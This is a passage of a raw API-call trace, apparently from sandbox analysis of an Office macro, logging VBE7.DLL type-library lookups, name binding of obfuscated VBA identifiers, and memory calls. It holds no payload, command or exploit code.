pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.929] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.929] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.929] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nAAAQCx", lHashVal=0x101220, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.929] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.929] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.929] IUnknown:Release (This=0x665ba50) returned 0xd [0068.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1034e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nAAAQCx") returned 15 [0068.929] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nAAAQCx", lHashVal=0x101220, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0068.929] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6186e | out: _Dst=0x144ec0) returned 0x0 [0068.930] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KCQ4A_G", lHashVal=0x1047d7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61896, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KCQ4A_G") returned 8 [0068.930] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KCQ4A_G", lHashVal=0x1047d7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61896, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KCQ4A_G") returned 8 [0068.930] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KCQ4A_G", lHashVal=0x1047d7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KCQ4A_G") returned 0x1047d7 [0068.930] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KCQ4A_G" | out: _Dst="KCQ4A_G") returned 0x0 [0068.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KCQ4A_G") returned 8 [0068.930] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.930] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KCQ4A_G", lHashVal=0x1047d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.930] IUnknown:Release (This=0x665ba50) returned 0xd [0068.930] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.930] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KCQ4A_G", lHashVal=0x1047d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.930] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.930] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.930] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KCQ4A_G", lHashVal=0x1047d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.930] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.930] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.930] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KCQ4A_G", lHashVal=0x1047d7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.930] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61896, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KCQ4A_G") returned 8 [0068.930] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KCQ4A_G", lHashVal=0x1047d7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.930] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.930] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61896 | out: _Dst=0x67c2d40) returned 0x0 [0068.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KCQ4A_G") returned 0x103bda [0068.930] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KCQ4A_G" | out: _Dst="_B_var_KCQ4A_G") returned 0x0 [0068.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KCQ4A_G") returned 15 [0068.930] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.930] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KCQ4A_G", lHashVal=0x103bda, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.931] IUnknown:Release (This=0x665ba50) returned 0xd [0068.931] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.931] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KCQ4A_G", lHashVal=0x103bda, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.931] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.931] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.931] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KCQ4A_G", lHashVal=0x103bda, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.931] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.931] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.931] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KCQ4A_G", lHashVal=0x103bda, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.931] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.931] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.931] IUnknown:Release (This=0x665ba50) returned 0xd [0068.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1037e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KCQ4A_G") returned 15 [0068.931] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KCQ4A_G", lHashVal=0x103bda, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41003400000000, pDummy=0x0) returned 0x0 [0068.931] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61896 | out: _Dst=0x144ec0) returned 0x0 [0068.931] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tDxAA1", lHashVal=0x107dba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tDxAA1") returned 7 [0068.931] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tDxAA1", lHashVal=0x107dba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tDxAA1") returned 7 [0068.931] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tDxAA1", lHashVal=0x107dba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tDxAA1") returned 0x107dba [0068.931] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tDxAA1" | out: _Dst="tDxAA1") returned 0x0 [0068.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tDxAA1") returned 7 [0068.932] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.932] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tDxAA1", lHashVal=0x107dba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.932] IUnknown:Release (This=0x665ba50) returned 0xd [0068.932] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.932] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tDxAA1", lHashVal=0x107dba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.932] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.932] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.932] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tDxAA1", lHashVal=0x107dba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.932] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.932] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.932] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tDxAA1", lHashVal=0x107dba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.932] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a618be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tDxAA1") returned 7 [0068.932] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tDxAA1", lHashVal=0x107dba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.932] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.932] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a618be | out: _Dst=0x67c2d40) returned 0x0 [0068.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tDxAA1") returned 0x10f863 [0068.932] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tDxAA1" | out: _Dst="_B_var_tDxAA1") returned 0x0 [0068.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tDxAA1") returned 14 [0068.932] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.932] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tDxAA1", lHashVal=0x10f863, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.932] IUnknown:Release (This=0x665ba50) returned 0xd [0068.932] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.932] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tDxAA1", lHashVal=0x10f863, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.932] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.932] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.932] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tDxAA1", lHashVal=0x10f863, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.932] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.932] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.933] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tDxAA1", lHashVal=0x10f863, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.933] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.933] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.933] IUnknown:Release (This=0x665ba50) returned 0xd [0068.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b103ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tDxAA1") returned 14 [0068.933] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tDxAA1", lHashVal=0x10f863, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.933] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a618be | out: _Dst=0x144ec0) returned 0x0 [0068.933] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.933] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.933] IUnknown:Release (This=0x665ba50) returned 0xd [0068.933] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.933] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.933] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.933] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.933] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.933] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b30000 [0068.934] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.934] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.934] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.934] IUnknown:Release (This=0x665ba50) returned 0xd [0068.934] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.934] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.934] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.934] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.934] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.934] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.934] IUnknown:Release (This=0x665ba50) returned 0xd [0068.934] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.934] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.934] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.934] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.934] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.934] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.934] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.934] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.934] IUnknown:Release (This=0x665ba50) returned 0xd [0068.934] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.934] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.935] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.935] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.935] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.935] IUnknown:Release (This=0x665ba50) returned 0xd [0068.935] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.935] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.935] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.935] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.935] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.935] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.935] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.935] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.935] IUnknown:Release (This=0x665ba50) returned 0xd [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.935] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.935] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.935] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.935] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.935] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.935] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.935] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.935] IUnknown:Release (This=0x665ba50) returned 0xd [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.935] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, 